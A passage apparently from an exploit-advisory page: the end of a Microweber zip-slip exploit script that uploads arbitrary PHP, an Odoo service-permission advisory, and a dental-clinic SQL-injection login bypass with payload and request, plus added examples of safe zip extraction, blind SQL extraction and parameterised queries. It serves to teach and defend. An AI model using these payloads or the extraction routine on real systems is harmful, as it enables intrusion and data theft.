    parser.add_argument("--hostname", required=True, dest="hostname",
                        help="Microweber hostname with protocol (e.g. http://microwebertest.com)")
    parser.add_argument("--http-proxy", required=False, dest="http_proxy",
                        help="HTTP Proxy (e.g. http://127.0.0.1:8000)")
    parser.add_argument("--username", "-u", required=True, dest="username",
                        help="Username of administrative user")
    parser.add_argument("--password", "-p", required=True, dest="password",
                        help="Password of administrative user")
    parser.add_argument("--payload", required=False, dest="payload",
                        help="Payload contents. Should be a string of PHP code. (default is phpinfo() )")
    # Uncommon args
    parser.add_argument("--target-file", required=False, dest="target_file",
                        help="Target filename of the payload (default: payload.php)")
    parser.add_argument("--target-path", required=False, dest="target_path",
                        help="Target path relative to webroot for the payload (default: /userfiles/cache/)")
    parser.add_argument("--zip-name", required=False, dest="zip_name",
                        help="File name of tmp backup zip")
    args = parser.parse_args()

    proxies = None
    if args.http_proxy:
        proxies = {"http": args.http_proxy}

    m = Microweber(args.hostname, proxies=proxies)
    if args.target_file:
        m.targetFilename = args.target_file
    if args.target_path:
        m.targetPath = args.target_path
    if args.zip_name:
        m.zipPayloadName = args.zip_name

    m.login(args.username, args.password)
    m.exploit(args.payload)
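The exploit above works because Microweber's backup restore extracted archive members under their stored names, so a member called ../../../../userfiles/cache/payload.php escaped /storage/cache/backup_restore/<hash>/ and landed in the webroot. The following is an added example, not part of sl1nki's exploit or of Microweber: it builds the same kind of traversal archive and then shows the containment check a restore routine needs in order to reject it, run against a throwaway directory tree shaped like the extraction path the exploit's comment describes. The directory layout, the hash name and the benign member are constructed for the demonstration.

```python
"""Added example, not from the Microweber exploit or the Microweber code base:
a zip-slip archive beside an extractor that refuses it."""
import io
import os
import tempfile
import zipfile


def build_traversal_zip(entry_name: str, content: bytes) -> bytes:
    """Single-member archive whose name climbs out of the extraction directory,
    the same construction createZip() above borrows from evilarc."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(entry_name, content)
    return buf.getvalue()


def safe_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """Extract an archive, refusing it whole if any member would land outside
    dest_dir. Returns the absolute paths written."""
    dest = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = zf.infolist()
        targets = []
        # Validate every name before writing anything, so a bad archive has no effect
        for info in members:
            target = os.path.realpath(os.path.join(dest, info.filename))
            # commonpath catches '../' climbs and absolute member names alike
            if os.path.commonpath([dest, target]) != dest:
                raise ValueError(f"refusing {info.filename!r}: resolves to {target}, outside {dest}")
            targets.append(target)
        written = []
        for info, target in zip(members, targets):
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def demo() -> dict:
    """Run a benign and a traversal archive through safe_extract inside a
    constructed tree mirroring /storage/cache/backup_restore/<hash>/."""
    evil = build_traversal_zip("../../../../userfiles/cache/payload.php", b"<?php phpinfo(); ?>")
    benign = build_traversal_zip("backup/site.sql", b"-- constructed sample dump\n")
    result = {}
    with tempfile.TemporaryDirectory() as root:
        extract_dir = os.path.join(root, "storage", "cache", "backup_restore", "0123abcd")
        os.makedirs(extract_dir)
        result["benign"] = [os.path.relpath(p, extract_dir) for p in safe_extract(benign, extract_dir)]
        try:
            safe_extract(evil, extract_dir)
            result["evil"] = "extracted"
        except ValueError:
            result["evil"] = "rejected"
        # The exploit's goal: a PHP file four levels up, inside the webroot
        result["planted"] = os.path.exists(os.path.join(root, "userfiles", "cache", "payload.php"))
    return result


if __name__ == "__main__":
    print(demo())
```

Python's own ZipFile.extractall() already strips leading slashes and '..' components, so the check matters for hand-written extractors like the PHP Unzip class the exploit targets, and for any code that builds the destination path itself from info.filename. Resolving both sides with realpath before comparing is what keeps a symlinked destination directory from defeating a plain string-prefix test.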
Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
# Exploit Author: 1F98D
# Vendor Homepage: https://www.odoo.com/
# Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe
# Tested Version: 12.0.20190101
# Tested on OS: Windows

# Step to discover Unquoted Service Path:

C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm"
C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M)
                                      NT SERVICE\TrustedInstaller:(I)(F)
                                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                      NT AUTHORITY\SYSTEM:(I)(F)
                                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                      BUILTIN\Administrators:(I)(F)
                                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                      BUILTIN\Users:(I)(RX)
                                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

The first ACE is the relevant one: pc-1\user-1 holds Modify (M) on the nssm directory, inherited by files (OI) and subfolders (CI), so that account can replace nssm.exe, the binary the service runs.
Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
# Date: 12.05.2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Ubuntu 18.04 LTS

# Description:
# An attacker can bypass the admin login page, because user input is concatenated into the SQL query without sanitisation, and so reach the internal content.

# Vulnerable code in /admin/index.php, line 34:
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";

# Payload:
admin' or '1' = '1 -- -

# Proof of concept: http://localhost/admin/index.php

POST /admin/index.php HTTP/1.1
Host: localhost
Content-Length: 54
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close

username=admin'+or+'1'%3d1+--+-&password=test&submit=
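The Dental Clinic advisory shows the string-built login query; the PHP Timeclock advisory earlier on this page shows what the same flaw yields once sqlmap drives it blind. The following is an added example, not code from either project: the concatenated query reproduced over an in-memory SQLite table, the authentication-bypass payload run against it, a boolean-blind extraction of a column one character at a time (the bisection sqlmap's boolean-based technique performs, with the login result standing in for sqlmap's --not-string="Warning" oracle), and the parameterised query that resists both. SQLite stands in for MySQL, so the inference condition uses substr()/unicode() rather than the MySQL-specific RLIKE and SLEEP payloads quoted above; the users table and its row are constructed.

```python
"""Added example, not code from the Dental Clinic system or PHP Timeclock:
string-built login query vs. placeholders, with bypass and blind extraction."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Dent4l!')")  # constructed row
    return conn


def vulnerable_login(conn, username: str, password: str) -> bool:
    # Same shape as the query quoted from /admin/index.php: values spliced into SQL text
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username: str, password: str) -> bool:
    # Placeholders keep the values out of the SQL grammar entirely
    row = conn.execute("SELECT * FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row is not None


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """oracle(condition) -> True when the injected condition held.
    Recovers the subquery's single-row result with a binary search over the
    ASCII range per character, about seven requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # ifnull() maps the NULL that substr() past the end produces to 0
            if oracle(f"ifnull(unicode(substr(({subquery}),{pos},1)),0) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # no character at this position: the value is complete
            break
        out += chr(lo)
    return out


def demo() -> dict:
    conn = make_db()
    bypass = "admin' or '1' = '1 -- -"          # the advisory's payload
    # The oracle: a successful login means the injected condition was true.
    # The trailing comment swallows the original AND password='...' clause.
    oracle = lambda cond: vulnerable_login(conn, f"admin' AND {cond} -- ", "x")
    return {
        "bypass_vulnerable": vulnerable_login(conn, bypass, "test"),
        "bypass_safe": safe_login(conn, bypass, "test"),
        "leaked": blind_extract(oracle, "SELECT password FROM users WHERE username='admin'"),
        "inject_safe": safe_login(conn, "admin' AND 1=1 -- ", "x"),
    }


if __name__ == "__main__":
    print(demo())
```

One detail worth knowing when reusing the bypass payload: because the template's closing quote follows the injected text, the '1 -- -' part ends up inside a string literal rather than as a comment, so the query becomes username='admin' OR ('1' = '1 -- -' AND password='test'), and the OR only succeeds because a row named admin exists. The fix in PHP is the same as safe_login() here: prepare() with bound parameters, and a password_hash()/password_verify() comparison instead of matching a stored plaintext password in SQL.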